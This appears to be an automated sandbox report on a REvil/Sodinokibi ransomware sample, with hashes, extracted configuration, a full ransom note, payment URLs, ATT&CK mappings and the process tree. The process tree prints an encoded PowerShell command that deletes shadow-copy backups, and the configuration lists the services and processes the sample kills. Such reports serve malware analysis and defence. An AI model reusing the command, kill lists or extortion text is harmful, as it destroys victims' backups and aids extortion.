Analysis

  • max time kernel
    134s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    08-03-2024 13:35

General

  • Target

    2024-03-08_8be4b3f41ef22c97f04eeb68d490dd5b_revil.exe

  • Size

    123KB

  • MD5

    8be4b3f41ef22c97f04eeb68d490dd5b

  • SHA1

    e94debf303e6b83194e45659a7cb8f26b7ad8519

  • SHA256

    3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c

  • SHA512

    926102a46daf75c877f07870f0e0d298518f5699f453d525f946b8eaa9fed3934603cdd6e6f5e6e7c3be8825ebd3cf1a055f119bb7d862a3cfa7ff48cd436617

  • SSDEEP

    1536:7DvcP30ThpshwVs5OE8yNcYQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxN:yrSVhaNcYM8gnBR5uiV1UvQFOxN

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice, dbsnmp, mydesktopservice, outlook, ocomm, excel, mydesktopqos, isqlplussvc, onenote, tbirdconfig, msaccess, encsvc, infopath, steam, thebat, agntsvc, sql, visio, wordpad, winword, dbeng50, powerpnt, firefox, xfssvccon, mspub, oracle, thunderbird, ocssd, synctime, ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===---
    [+] Whats Happen? [+]
    Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
    [+] What guarantees? [+]
    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
    [+] How to get access on website? [+]
    You have two ways:
    1) [Recommended] Using a TOR browser!
    a) Download and install TOR browser from this site: https://torproject.org/
    b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
    a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
    b) Open our secondary website: http://decryptor.cc/{UID}
    Warning: secondary website can be blocked, thats why first variant much better and more available.
    When you open our website, put the following data in the input form:
    Key: {KEY}
    -----------------------------------------------------------------------------------------
    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!

  • sub

    4085

  • svc

    memtas, mepocs, backup, sophos, sql, svc$, veeam, vss

Extracted

Path

C:\Users\8l8n326464-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 8l8n326464. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/ED36E0599C455637 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/ED36E0599C455637 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: S/n4SXWLFmqXfiUwz5n48En64dqFNgLxcA0H1PIbkNf8AUbrUCgTyjqpg9TcqQVA E/OkZgyUnj9HzCB96dyZosuEtRyafLBBgU/6jRRWufJGejo+HpE8oPabIFsiArHo vg14pqqnDSfY/d1GELwcYVzvOol+ovypd1hrRPEwMIY++WL5oI/3rSn+neY0kH7B rJqkV6AU/R40ozENGd52sKiI3mYWvl71oGCTjCnMUL09X21EQEiZBbrbTNeztMM7 ctEfDecFbLytJylS/mGXO4kjUdQ15Ob789bV+hQIqmX1wZpyfvd/4laP2NQOAlzF 6skqivwGgMeGS2byBfTbgiXOfwHVMpQ7dF4sWqLkjtw39pnbqZfmnaRws+aaCd/v 2NfMSjqTF9hKBxNYNqMmiZd0YaqB+Qvk49v5qAWWG4+cBn0vY1D95YPrmGMvpdgS Pyr+/nwD10TbDzVR9hh23pADU4wEecOSGhtAOK2Ix7FVuTOzmdefYrVxIYEn1v/Z u0vY5QwZR9ZeM/li8wTxp7dvc12tR4874MjnxwZE5FB777NJJ9mC6c/cHC6A1I8B bzyvXbIxuAzFBKEqthIhmQ6+4b6ScCVEHWO/C6o8Su8f3jPm6FQuUtlQ9HM9No/x oufxSTkKNQuhTtxuBk9H7cVw1NyK0IXP15g3SXY6Cmp2x/WJfK/PIvoHR1biW+pm GGWsDyv5ttpmpweXttfeF9+t/LJR8QVBjIVtuP+VVJieq5Jhy/hMbHn38564x8PQ rmpyflWwM7ubcv8Hk9FrRf5l17QkHbk/SfNM3x/0Nm+7E/GxMwHuuUIz6pe2sIY7 Uk3bnZ57yxv0jiydzrF2asfAjH5D0XuhvVQilaCqNyRPPB2xyoQaa0JTTdljBYon kSs0fvBVuYi1K0wh5950/yZduPp6tPlHZgfnx0mmw8LYnHCxuBbilwVZoP1CghUJ LcUmU5cfFERgcRm3bPz1UGfx1A16yv+wASGsI9aUohwspNmz6USgp+Xj5WSKUlqI dDvcjPTNoBilQufz/tYfMBWSjZ4ct6sfayA05/P9W9jg2+yJkqN+rWtW3d9zypkp 90ftYai183h9qCCN9V0W4yehanY+6MvFKcSAkHrsP6vSkiYR0LC9BZqJzFdHusAA QF1A5jGGNlDEvrf98gE/fIAyZyFF/WPWgYG2Xlg5pACyg7SQLSiL5t6m1PCBPWDL wQn6hTP/mWp+luF1h8f55C7ED7eIelAVPdkQQeVxU/BPdyHhLmZ5lqveJ64eVCAQ P/HuPlqQA8V4zqIDraHsedTREyK/shriTA/VZ/PQgVQj29lGeTMs7UPIJcw2Fque xeQ0SYf2AsQUYIlomKPlt+E+1RjJXkiJRnB7/fziOw7m8+Fharj5Eg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/ED36E0599C455637

http://decryptor.cc/ED36E0599C455637

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application (2 TTPs, 1 IoCs)
  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory (1 IoCs)
  • Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  • Drops file in Program Files directory (40 IoCs)
  • Modifies system certificate store (2 TTPs, 6 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (6 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-08_8be4b3f41ef22c97f04eeb68d490dd5b_revil.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-08_8be4b3f41ef22c97f04eeb68d490dd5b_revil.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1996
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2564
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2708

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    • Persistence: Boot or Logon Autostart Execution (T1547) 1; Registry Run Keys / Startup Folder (T1547.001) 1
    • Privilege Escalation: Boot or Logon Autostart Execution (T1547) 1; Registry Run Keys / Startup Folder (T1547.001) 1
    • Defense Evasion: Modify Registry (T1112) 3; Subvert Trust Controls (T1553) 1; Install Root Certificate (T1553.004) 1
    • Discovery: Query Registry (T1012) 1; Peripheral Device Discovery (T1120) 1; System Information Discovery (T1082) 1
    • Impact: Defacement (T1491) 1


    Downloads

    • C:\Users\8l8n326464-readme.txt
      Filesize

      6KB

      MD5

      11b9d2d5217bfc4fda939c4047649fa1

      SHA1

      54ad05694f5c001b28183774925e7a9ede677f6a

      SHA256

      ed790eeeb87e9df94e7dca2ae75e2e3c112aa06d923fc5896779f786991a4504

      SHA512

      ea6981824a65eea6b9fb248534b95f75e9ce7292a7b2ff63a02b1ceac225064b78ae6a11a18a7629fe7c99cc23f71dad0a7bbea840716f2fed91e445027341c9

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\Local\Temp\Cab6C9A.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar724C.tmp
      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      d5f3d400639335eeecc68443fd9c68fe

      SHA1

      02805bf4c6da3974ab77d2c387b394ab75dbfe17

      SHA256

      56784add7c0f76909876645e997114b66de01e2835846a44ceb8f7175d4cdc27

      SHA512

      9b11b320df2e4023fc9c3dc7282c83dca6c1292093ba0e3eab58708a6efcd935ce3f69b1890e24627e8ca1d8476c0750798016bef37cd4b60e48b9f1adcede60

    • memory/1908-0-0x00000000000D0000-0x00000000000F2000-memory.dmp
      Filesize

      136KB

    • memory/1908-513-0x00000000000D0000-0x00000000000F2000-memory.dmp
      Filesize

      136KB

    • memory/1996-8-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

    • memory/1996-10-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

    • memory/1996-13-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
      Filesize

      9.6MB

    • memory/1996-12-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

    • memory/1996-11-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

    • memory/1996-9-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
      Filesize

      9.6MB

    • memory/1996-7-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
      Filesize

      9.6MB

    • memory/1996-6-0x0000000002240000-0x0000000002248000-memory.dmp
      Filesize

      32KB

    • memory/1996-5-0x000000001B550000-0x000000001B832000-memory.dmp
      Filesize

      2.9MB